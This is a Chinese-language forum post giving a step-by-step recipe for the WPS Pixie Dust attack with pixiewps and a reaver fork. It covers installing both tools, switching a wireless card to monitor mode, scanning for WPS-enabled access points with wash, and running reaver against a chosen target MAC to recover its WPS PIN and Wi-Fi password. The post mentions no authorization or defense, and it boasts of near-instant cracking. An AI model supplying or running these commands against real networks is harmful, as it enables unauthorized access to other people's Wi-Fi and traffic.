既然坛子里的朋友想看,就抓紧放上来 工具说明: pixiewps 是一个wps离线攻击工具,利用了芯片上的算法漏洞,成功率不是很高,具体可以看 http://forum.anywlan.com/thread-356695-1-1.html wps 离线攻击. 英文好的可以看 https://forums.kali.org/showthre ... fline-WPS-Attack%29 WPS Pixie Dust Attack (Offline WPS Attack) reaver 1.5.2 这个是社区维护的reaver的分支,之所以使用这个版本是因为它加入了一个-K 参数 可以调用pixiewps来得到pin码,然后直接出密码,而不用输入命令。 https://github.com/t6x/reaver-wps-fork-t6x 安装 CDLinux http://forum.anywlan.com/thread-362108-1-1.html pixiewps + reaver-wps-fork-t6x of cdlinux 0.9.7.1 感谢open2012大神 Kali Linux apt-get install reaver pixiewps 如果你会使用git 也可以从github下载源码编译 pixiewps 1.1 cd /tmp git clone https://github.com/wiire/pixiewps cd pixiewps make & make install reaver 1.5.2 编译方法同上,先./configure make & make install https://github.com/t6x/reaver-wps-fork-t6x Wifislax 可以使用我打包好的模块 http://forum.anywlan.com/thread-362269-1-1.html //这里下载 也可以从github上编译,和kali linux下是一样的 使用 首先确保你的无线网卡能工作,进入monitor模式 airmon-ng start wlan0 使用wash -i mon0 来扫描开WPS的AP ctrl+c停止 [attach]557059[/attach] 使用命令 reaver -i mon0 -b 想要攻击的AP'MAC地址 -v -K 1 如果存在该漏洞的话,很快就能出pin和密码了 [attach]557060[/attach] 优点 几乎是秒破的节奏! 缺点 成功率着实不高 |
Powered by Discuz!
© 2003-2024 广州威思信息科技有限公司